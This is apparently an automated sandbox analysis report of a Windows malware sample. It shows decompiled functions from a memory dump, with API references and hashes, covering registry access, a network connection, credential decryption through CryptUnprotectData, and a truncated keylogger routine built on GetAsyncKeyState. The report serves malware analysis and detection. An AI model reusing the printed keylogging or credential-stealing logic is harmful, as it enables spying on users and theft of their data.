				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}

0x00410f71
0x00410f86
0x00410f8e
0x00410f97
0x00000000
0x00410fa3
0x00000000

APIs

RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74B60770,?,?,00411165,?,?), ref: 00410F8E

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2cedeb436092c0e7d31b5472948933f5d0e3bcf46d46cc8e0073c1b7bfb3d076
Instruction ID: 7669a687ca45e1490fd892bd00859a81e3b5d15af61ddd1ed0ad8dbd2140f463
Opcode Fuzzy Hash: 2cedeb436092c0e7d31b5472948933f5d0e3bcf46d46cc8e0073c1b7bfb3d076
Instruction Fuzzy Hash: 6DE0DF32515229FFDB308B528D09ECB3E6CDF45BE4F008025F60AA3140C2F18A81D6F4

Uniqueness

Uniqueness Score: -1.00%

Function 004031D4, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031D4(struct _EXCEPTION_RECORD* __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				struct _EXCEPTION_RECORD* _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00401052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E004035E5(_t14,  &_v1028); // executed
				return _t14;
			}

0x004031ed
0x004031ef
0x004031f1
0x00403207
0x00403216
0x00403220

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DispatcherEnvironmentExceptionExpandStringsUser
String ID:
API String ID: 1216311190-0
Opcode ID: 237e0090f58f7f10296270526495333552abd1a6647df425db10d62f2dbe6493
Instruction ID: 361a2c420108ea36677c7ead1158915028ec3e9eb633b46eb3cce66c0af5bf23
Opcode Fuzzy Hash: 237e0090f58f7f10296270526495333552abd1a6647df425db10d62f2dbe6493
Instruction Fuzzy Hash: 1FE048B670011967DB20AA169C06FD677ADDBC471CF0400B9B709F31D0E975DA46C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC7E, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FC7E(struct _EXCEPTION_RECORD* __ecx) {
				long _v8;
				short _v40;
				signed int _t16;
				struct _EXCEPTION_RECORD* _t21;

				_t21 = __ecx;
				_v8 = 0x10;
				_t16 = 8;
				memset( &_v40, 0, _t16 << 2);
				GetComputerNameW( &_v40,  &_v8);
				E004035E5(_t21,  &_v40); // executed
				return _t21;
			}

0x0040fc88
0x0040fc8a
0x0040fc91
0x0040fc97
0x0040fca1
0x0040fcad
0x0040fcb7

APIs

GetComputerNameW.KERNEL32 ref: 0040FCA1

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ComputerDispatcherExceptionNameUser
String ID:
API String ID: 3218006343-0
Opcode ID: 2d1d00a54f56b883c6e940ab6e499cdc34dd15ab98d5ab783c6b13c210f729b3
Instruction ID: aa3b1ce93433291561a2c2f7776a12b974490562063a821762419aac8ea60fbb
Opcode Fuzzy Hash: 2d1d00a54f56b883c6e940ab6e499cdc34dd15ab98d5ab783c6b13c210f729b3
Instruction Fuzzy Hash: 58E09A72A0010CA7CF04DAAAD9089CFBBFC9B88314F100476E501F7280EAB1EF4887A4

Uniqueness

Uniqueness Score: -1.00%

Function 00403272, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403272(WCHAR** __ecx, void* __edx, void* __eflags, char _a4) {
				short _v524;
				WCHAR** _t20;
				void* _t23;

				_t23 = __eflags;
				_t20 = __ecx;
				wsprintfW( &_v524, 0x4146a4, _a4);
				E004035E5( &_a4,  &_v524); // executed
				E00403335(_t20, _t23,  &_a4); // executed
				L00405EA5(_a4);
				return _t20;
			}

0x00403272
0x00403285
0x0040328d
0x004032a0
0x004032ab
0x004032b3
0x004032bc

APIs

wsprintfW.USER32 ref: 0040328D

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,74B60770), ref: 00403365

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DispatcherExceptionFreeUserVirtuallstrcatwsprintf
String ID:
API String ID: 433610521-0
Opcode ID: 4da861f6b37b5f3aaab824b9b6d041e80df94219558ec20bc9222f5be6fe00ff
Instruction ID: 34a8d1ec37296942f0d114e9581bc51dcf40e294b4b9308e6384c53faad07139
Opcode Fuzzy Hash: 4da861f6b37b5f3aaab824b9b6d041e80df94219558ec20bc9222f5be6fe00ff
Instruction Fuzzy Hash: C5E06D7050021CABCF10AF61DC4ACCA3B2C9B41398F004076B849A7191EE78EB98CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 00403335, Relevance: 1.5, APIs: 1, Instructions: 25
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403335(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E00403261(_t14);
				_t6 = E00405E46( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403261(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}

0x0040333b
0x0040333e
0x00403342
0x0040335b
0x00403360
0x0040336f

APIs

Part of subcall function 00403261: lstrlenW.KERNEL32(74B60770,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00403268

lstrcatW.KERNEL32(00000000,74B60770), ref: 00403365

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 6faf23d1a4cfa45ea84e11ef5373c353b7d7e62a0f14d1be2c89c1a7e14e6168
Instruction ID: 9996310d9ea1feaf5dd69399781489ef40f93ee32ef9e0fdad74d2a122f6ac21
Opcode Fuzzy Hash: 6faf23d1a4cfa45ea84e11ef5373c353b7d7e62a0f14d1be2c89c1a7e14e6168
Instruction Fuzzy Hash: 12E0D8722002105BCB006BAAE88486E7B5DEF95360B04007EF90597250EA346C108AD4

Uniqueness

Uniqueness Score: -1.00%

Function 004058D3, Relevance: 1.5, APIs: 1, Instructions: 23
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004058D3(void* __ecx, void* __eflags) {

				E004031C3(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E00410298(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}

0x004058d7
0x004058de
0x004058e1
0x004058eb
0x004058ee
0x004058f1
0x004058fc
0x00405902
0x00405908
0x0040590b
0x00405910

APIs

Part of subcall function 00410298: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,74B60770,00000000,00405A34), ref: 004102A0

WSAStartup.WS2_32(00000002,?), ref: 004058FC

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateMutexStartup
String ID:
API String ID: 3730780901-0
Opcode ID: 6b5ebe703eb1df4dc6c5b6a19a8fd1f855588e1ba8f6d968cf0325ade6988588
Instruction ID: 2f07ef21999864c7bdc7f9a93e1228b6d7789604c4959b27d926bf46a4c2bd3d
Opcode Fuzzy Hash: 6b5ebe703eb1df4dc6c5b6a19a8fd1f855588e1ba8f6d968cf0325ade6988588
Instruction Fuzzy Hash: E6E0ED71511B108BC270AF2B9945997FBFCFFD47207004B1FA4A782AA1C7B4B545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00401F4B, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F4B(void** __ecx, _Unknown_base(*)()* _a4, void* _a8) {
				void* _t8;
				void** _t13;

				_t13 = __ecx;
				_t8 = CreateThread(0, 0, _a4, _a8, 0, __ecx + 4); // executed
				 *_t13 = _t8;
				return 0 | _t8 != 0x00000000;
			}

0x00401f4f
0x00401f60
0x00401f68
0x00401f73

APIs

CreateThread.KERNEL32 ref: 00401F60

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 776aae2bde6a73750d665657968a4111cceb56700ba6f8cbb4cf5f40d2f6fc79
Instruction ID: 85d7c34d34c815029d1c60ee7f83d8e055e3a6fa08afb5758f44aaf4b39a5a12
Opcode Fuzzy Hash: 776aae2bde6a73750d665657968a4111cceb56700ba6f8cbb4cf5f40d2f6fc79
Instruction Fuzzy Hash: E9D05EB31042097FAB059FA9AC04CE77BDCEF08210301843AB989C6100E631DC109BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDA5, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FDA5(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00403125(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}

0x0040fdad
0x0040fdb2
0x0040fdc6
0x0040fdce

APIs

Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,74B60770,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151

CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0040FDC0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateEventlstrcat
String ID:
API String ID: 2275612694-0
Opcode ID: d77fbedff3ba7a8a40d08c96c1d35eb7da7fc8e6b34c6a04053cb1c89a0bcb6e
Instruction ID: 3240f45b1c7ddb12a8ade5aa24fea2b364c3baaf0ce4d7f612b8c195746a9c55
Opcode Fuzzy Hash: d77fbedff3ba7a8a40d08c96c1d35eb7da7fc8e6b34c6a04053cb1c89a0bcb6e
Instruction Fuzzy Hash: 65D05E322442057BD710EF91DC0AF86FF6AEB95761F008036F65996590DBB1A030C794

Uniqueness

Uniqueness Score: -1.00%

Function 00410298, Relevance: 1.5, APIs: 1, Instructions: 15
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410298(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}

0x0041029b
0x004102a0
0x004102a8
0x004102b2
0x004102b6

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,74B60770,00000000,00405A34), ref: 004102A0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: e9934b6d034fafb1d0200725ba1cf85a26b321b84d8249228bf6a4144c015bfc
Instruction ID: 97f6e39e9459aadd3e0cfa1cac3660fe97848e7290b305563a34b971961bdcef
Opcode Fuzzy Hash: e9934b6d034fafb1d0200725ba1cf85a26b321b84d8249228bf6a4144c015bfc
Instruction Fuzzy Hash: 43D012F15005205FA3249F395C488A775DDEF98720315CE39B4A5C71D4E6308C808770

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF0B, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,0040C8CF,00000000), ref: 0040FF12

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeleteFileFreeVirtual
String ID:
API String ID: 2980554289-0
Opcode ID: c3146d6bb2aee011ef50f1a5555ad5e518b00abbe9eb622f2990967ae33d6581
Instruction ID: 2cdc3e59cd56f43dd758d49ef7106ed7b60e0fd37645f69375ad340a1293d416
Opcode Fuzzy Hash: c3146d6bb2aee011ef50f1a5555ad5e518b00abbe9eb622f2990967ae33d6581
Instruction Fuzzy Hash: D8C01235200228A7CB102BA6E80888A7F18EA802E27004032F90887210CA35A9408AC4

Uniqueness

Uniqueness Score: -1.00%

Function 00410FAE, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c98f4b4dfda092bd2d12ca10e2daea2df349831acd3782244b87714ec316371f
Instruction ID: 3bf35448e78bb38c218515adc370377afc947f5d07f08b3267651bc3409b9d1e
Opcode Fuzzy Hash: c98f4b4dfda092bd2d12ca10e2daea2df349831acd3782244b87714ec316371f
Instruction Fuzzy Hash: FAC04832024221CBE7361F18F8097D1BAE6AB44322F29086EE4C0661A4E7F908D1CA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040F71F, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32(00000000,?,00000000,004111A6,00000000,?,?,?,?,00000000,74B60770,00000000), ref: 0040F725

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d5e727189ccb4a8055294063d4bcc6c1c118f0409fcdf43886da262030cd376a
Instruction ID: 31fd1221f8bcf50e00c872df143f66dd9980ced791cc60c43c08ecf6c7bc2ccd
Opcode Fuzzy Hash: d5e727189ccb4a8055294063d4bcc6c1c118f0409fcdf43886da262030cd376a
Instruction Fuzzy Hash: 6EB012303E830157DA401B708C06F1035129782F07F2001B0B156C80E0C66100005508

Uniqueness

Uniqueness Score: -1.00%

Function 046F7FF2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,046F9841,0470DD38,00000314,00000000,?,?,?,?,?,046F714A,0470DD38,Microsoft Visual C++ Runtime Library,00012010), ref: 046F7FF4

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 6e1e783604cc6d69d65a139a75f4a09b3ad97e1550e510e3e12ba7e48669e25d
Instruction ID: 01558d0e36ff2daf60be6026cc0cdc71473c92634690c7b15da4cdb99add361a
Opcode Fuzzy Hash: 6e1e783604cc6d69d65a139a75f4a09b3ad97e1550e510e3e12ba7e48669e25d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004109D2, Relevance: 1.3, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,?,?,?,?,?,00000000), ref: 004109FE

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4595617cde2d52488758fc6246cd1380556eb0b7d089990bcd15bd8f180c96fe
Instruction ID: 2a62ad65f91da008a8a26c3de1ee0f60871e50a62a68f369bcf6ddd35738c48e
Opcode Fuzzy Hash: 4595617cde2d52488758fc6246cd1380556eb0b7d089990bcd15bd8f180c96fe
Instruction Fuzzy Hash: 0A21C571700300ABCB15ABAD9C42BBF77A59F84344F58406AF945DB382DAB8D981875C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA78, Relevance: 1.3, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 0040CD49: LocalAlloc.KERNEL32(00000040,0000006C,?,00000000,?,?,?,0040CA8B,?,00000000,?,?,?,0040CA44), ref: 0040CD60

GetLastError.KERNEL32 ref: 0040CADE

Part of subcall function 0040CAFC: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040CB24
Part of subcall function 0040CAFC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB3B
Part of subcall function 0040CAFC: LocalFree.KERNEL32(0040CAD5,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB5B

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$Alloc$CryptDataErrorFreeLastUnprotect
String ID:
API String ID: 3020471963-0
Opcode ID: d3d59f28e6c06bb98115ad848f8e3cc4b3039b9c472184a325e41d7aa71e200a
Instruction ID: 8bfbf415954422009f1027d4ebe890d41a43279c9f43c181279a9f2cbbe85a0e
Opcode Fuzzy Hash: d3d59f28e6c06bb98115ad848f8e3cc4b3039b9c472184a325e41d7aa71e200a
Instruction Fuzzy Hash: 4801B932B00019D7CF15ABEA89C16AF76659F84754F11033EEC04B7391EA78CD1657D9

Uniqueness

Uniqueness Score: -1.00%

Function 00410969, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 637efa65d1edcc19631964704b66eec4856eb278cdc3a1d0eb1fa48189d9d1bb
Instruction ID: 3e724fc7076cd7e0301a8b839e7f69fb0f430cb714604aaa6d5e3932d80ff704
Opcode Fuzzy Hash: 637efa65d1edcc19631964704b66eec4856eb278cdc3a1d0eb1fa48189d9d1bb
Instruction Fuzzy Hash: 820148B2A10615AFD710DF99C895EAAB7A8FB45314B04016AA441C3702EA74E9E58AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E5B, Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404E98,?), ref: 00403581
Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 004035AC

Part of subcall function 004057FB: getaddrinfo.WS2_32(74B60770,00000000,00404EA0,00000000), ref: 00405848
Part of subcall function 004057FB: socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
Part of subcall function 004057FB: htons.WS2_32(00000000), ref: 00405885
Part of subcall function 004057FB: freeaddrinfo.WS2_32(00000000), ref: 00405895
Part of subcall function 004057FB: connect.WS2_32(?,?,00000010), ref: 004058A1

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Sleep.KERNEL32(?,?,?,?,?,?,00000000,74B60770,00000000), ref: 00404ECD

Part of subcall function 0040562F: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405666
Part of subcall function 0040562F: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 004056B6
Part of subcall function 0040562F: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405726

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
String ID:
API String ID: 3250391716-0
Opcode ID: 37faa6d950f2a485223d43eacdbc8dccf55587ee141c80a98d316695b3c35493
Instruction ID: bc428e3b3ddef9970cb7552f4481440b7a1607d56a947ca5766a3555ac43b341
Opcode Fuzzy Hash: 37faa6d950f2a485223d43eacdbc8dccf55587ee141c80a98d316695b3c35493
Instruction Fuzzy Hash: 85018071600915ABDB14AB75C849AEFF778FB40319F00022AE51AB3181DB786A54CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB67, Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,0040CEFE,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CB84

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c828d0766a3b108bf13a49189170ded25feb309e79460a3d6ad0a14ad9ea2c27
Instruction ID: bf2bb2bbd1b041f8a059ececb4b9983cfd9120ccf3b928968d874a4660e84ce4
Opcode Fuzzy Hash: c828d0766a3b108bf13a49189170ded25feb309e79460a3d6ad0a14ad9ea2c27
Instruction Fuzzy Hash: F5E02B3A30072147D3114B8E64C1A63A2BE8BC9600B1841379D8993344DA38DC024198

Uniqueness

Uniqueness Score: -1.00%

Function 00405E22, Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 820d568b735e8b98086b9003d51802545f577bee81ea7e8b788eea8fe27fb93a
Instruction ID: 4cf4b96cc7d198ddbfe5a03f5e3f7b68f09905f0a8ce7e22956d0c5921a7b56d
Opcode Fuzzy Hash: 820d568b735e8b98086b9003d51802545f577bee81ea7e8b788eea8fe27fb93a
Instruction Fuzzy Hash: B9C0122234822027F124115BBC1AF5B8D5CCBC1F75F01002FF7049A2D0D8D50C0281A8

Uniqueness

Uniqueness Score: -1.00%

Function 00409FCE, Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 62325fd014d102c71d90c56f2f6d609a61725c63e8465867eab987d24a3df0f7
Instruction ID: e42f407c2e177447542b0d64c950044e8bfaee0f330607f11840718ece24623c
Opcode Fuzzy Hash: 62325fd014d102c71d90c56f2f6d609a61725c63e8465867eab987d24a3df0f7
Instruction Fuzzy Hash: A4B0923038070057EE2CCB308C95F6A2311BB80B06FA185ADB182EA1D08BB9E4418A48

Uniqueness

Uniqueness Score: -1.00%

Function 00405EB4, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00405EBE

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d49ef48d043526f3490ffb0dd7c6a127032e0ea4a4a3536e1287c42be51b02d7
Instruction ID: dbf17126153eed8f7640880b16ee2d7e8fc1bb2d9721b8e08dab88764d432ae1
Opcode Fuzzy Hash: d49ef48d043526f3490ffb0dd7c6a127032e0ea4a4a3536e1287c42be51b02d7
Instruction Fuzzy Hash: 32A002F07D53007AFD6997A1ED1FF553D18A784F16F204154B30D6D0D095E02500852D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004089D5, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004089D5(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E00408E66(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
